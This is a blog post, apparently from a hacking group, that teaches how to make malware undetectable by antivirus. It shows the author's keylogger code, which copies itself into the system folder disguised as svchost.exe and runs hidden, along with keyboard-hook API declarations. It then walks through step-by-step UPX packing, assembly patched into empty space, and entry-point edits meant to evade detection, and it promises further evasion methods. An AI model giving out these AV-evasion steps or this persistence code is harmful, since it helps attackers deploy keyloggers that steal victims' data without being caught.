Abysssec Security Research

In the name of god
Hi, I’m MrXX and in this blog I want to talk about the some coding, reversing and more…

And please don’t post the some shit comment in the index, because we going to delete it
And please don’t spam us with Noob question, cause they don’t answer the Noob
And the last think sorry about the English, cause I can’t even talk in English (I just can read) by the way

In the first, I want to talk about some reversing (I tired and seek and my mind wasn’t work correctly)
This is not my tut by I search over the web 2 or 3 day to find the best way & I think this is best way (original tut by : Kenny)

To undetected the malware from antivirus

First we need tools
1-Hex editor: I use the HIEW (not the 32 bit ver)
2-PE Tools: I use the PE Tools v1.5
3-UPX
4-Cracker call this BRAIN (I think I got it by I can’t give it to u, go find yours) 
If u don’t know what is those tools and how u can use it: I tell u go f.u.c.k yourself and please don’t read this
Ok , I read the magic world and dorooooororooooooo : oh my god magic happen :) , my f.u.c.k.ing malware undetected , ha ha ha ha I’m kidding there is no magic & magic is just some shit , every think in this whole world have the logical reason (I don’t believe magic)
Make malware (Trojan,rootkit,virus,…) undetected just have some little ways and if u like it I tell all the possible way to make our malware tools undetected ,but I tell it 1 by 1 , and if I see some , kididi mididi tnx in the comment I tell the next magic world
Let’s pull the chair close to your PC and get started
I wrote my own keylogger many year ago , but god DAMN antivirus known my own private keylogger as the probably unknown NewHeur_PE virus

And nod want to submit this to them Database

Oh my god how could this happen :) , don’t worry about that I tell u next time how u can bypass the stupid antivirus with some cryptography
In this time I want to undetected the binary file (u can use this to make all the binary malware u don’t have them source)
See the virustotal result: that’s nasty

And u will see, some of antivirus detect the malware and some of them don’t detected because is this private
Malware detected because of some of the line like:

Dim ModuleName As String, FileName As String, hInst As Long
ModuleName = String$(128, Chr$(0))
hInst = GetWindowWord(Me.hwnd, GWW_HINSTANCE)
ModuleName = Left$(ModuleName, GetModuleFileName(hInst, ModuleName, Len(ModuleName)))

If CheckPath(SystemDir + “svchost.exe”) = False Then
FileCopy ModuleName, SystemDir + “svchost.exe”
ShellExecute Me.hwnd, “open”, SystemDir + “svchost.exe”, vbNullString, vbNullString, SW_HIDE
End
End If

Or
Because the uses of those api

Private Declare Function SetWindowsHookEx Lib “user32″ Alias “SetWindowsHookExA” (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib “user32″ (ByVal hHook As Long) As Long
And…

Ok later we crypt those command and use the API very cleverly to bypass the Noob antivirus
Oh we talk some much let’s back to the undetected part
First we pack the file with UPX (do something else) and we open our packed file with the PE Tools

Open file and get some info about the entrypoint

Entry Point: 0000AD20
Image Base: 00400000

Now we open the packed file with HIEW in the disassemble mode we going to entry point
U will see some entry like this

This is the entry that was UPX make
When we scroll done some line we will see zero space, we use this for hexing our tool
Place those codes into the zero space
Use the edit F3/F2 command

push        00040AD20   <— push OEP
push        eax
pushfd                   <—for tricking AVP
pushad                    <—for tricking AVP
call       .000025154  <—– call for Ret 28h
retn 00028

The address depend on your system and those are not the static

After that , save the progress
And again add 2 line

INC ECX  <— Counter up
Loop 000022D9

Save them again
Ok our hexing finish , now we must go and change our entry point to the new entry
We open the PE Tools again change the entry point to the new value

OEP = entry address – imagebase(400000)

New entry:0040AED9

After that we unpack the file with UPX an it must be undetected from AV
This method called: changing the entry point for undetected the malware
That’s the nice way but we got the easy way to like Pack the file , hexing the Signature of the file and  …

In the next post I talk about ElF File’s And Reversing
Good Luck
MrXX